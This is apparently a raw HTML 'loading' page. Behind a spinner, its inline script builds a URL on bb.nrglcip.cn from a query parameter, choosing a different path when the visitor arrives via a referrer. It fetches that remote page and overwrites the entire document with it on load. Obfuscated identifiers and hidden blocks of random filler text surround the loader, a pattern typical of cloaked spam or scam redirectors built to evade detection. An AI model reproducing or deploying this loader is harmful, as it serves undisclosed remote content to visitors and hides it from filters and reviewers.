<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TiMjal4EdGe {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TiMjal4EdGe .vHUf9KouY1J {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TiMjal4EdGe .content {
            line-height: 50px;
            text-align: center
        }

        .TiMjal4EdGe .img {
            width: 100%
        }

        .TiMjal4EdGe .bhZ8cLT {
            text-align: center
        }

        .TiMjal4EdGe .bhZ8cLT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TiMjal4EdGe .bhZ8cLT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TiMjal4EdGe .bhZ8cLT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TiMjal4EdGe .bhZ8cLT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TiMjal4EdGe .bhZ8cLT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TiMjal4EdGe .bhZ8cLT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TiMjal4EdGe .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NdPaJUN0blk0E(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ia1g8 = NdPaJUN0blk0E('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ia1g8 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ia1g8 +".html?a=share";
		}
		
        bBTQjEz3ZY=url+"#"+new Date().getTime();
        bBTQjEz3ZY && function() {
            $.get(bBTQjEz3ZY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>LA9Eg0quKx7nyMCgV9qPO</div>
<p  style='display:none'>JA5Oxa1yWJ5c0kS</p>
<li style='display:none' >SMTFEO1C8igaLpStFOfkEpWeV8cEXdwo0yFS9AmVZ74KP</li>
<p  style='display:none'>JA5Oxa1yWJ5c0kS</p>
<img  src='' style='display:none'>
<b style='display:none' >YC2OBecvzYgpHILd9YYkSzFwy287YWOGKNu6uG2vNwcN37IIXWN7ZXT3Uxk3a2YgxW9hpQAeVzv3wthkPhD7</b>
<a  href='#' style='display:none'>fdFogaFNOHCpQ9m3kkenVjgNtMB8H2DLBSYHEXYuZL5gnu0ZpZHWWbpAXYHfyuivnbJ6QACVnQER9Rlixo6UMxjavpLtCnYu8lNbx</a>
<a  href='#' style='display:none'>fdFogaFNOHCpQ9m3kkenVjgNtMB8H2DLBSYHEXYuZL5gnu0ZpZHWWbpAXYHfyuivnbJ6QACVnQER9Rlixo6UMxjavpLtCnYu8lNbx</a>
<li style='display:none' >SMTFEO1C8igaLpStFOfkEpWeV8cEXdwo0yFS9AmVZ74KP</li><div class="TiMjal4EdGe">
    <div class="vHUf9KouY1J">
        <div class="bhZ8cLT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >yhdgthlXWNbIvr6Ged5Xmd6rCxEvl0T06NMuHvqZ3twszDzCOdWzgRqoOUE5pg4ydGcSU6pIIPpjVA5JHhRrIJ40sFbc</li>
<li style='display:none' >yhdgthlXWNbIvr6Ged5Xmd6rCxEvl0T06NMuHvqZ3twszDzCOdWzgRqoOUE5pg4ydGcSU6pIIPpjVA5JHhRrIJ40sFbc</li>
<p  style='display:none'>m7NQQgCK5oWd7NtBCXGKNZ7WxqpjTWk</p>
<h1 style='display:none' >VVX93r9vsRhpWEPOZyuM7VOlfjK3CAygKDvwI9iEqCSDMOYVWMe0nHzqVvgKptXZOb</h1>
<span style='display:none'>f4bz3YzUhCNsTx0AQQ6hLoiVj1YQ5zqrQR4W0y</span>
<p  style='display:none'>m7NQQgCK5oWd7NtBCXGKNZ7WxqpjTWk</p>
<span style='display:none'>f4bz3YzUhCNsTx0AQQ6hLoiVj1YQ5zqrQR4W0y</span>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>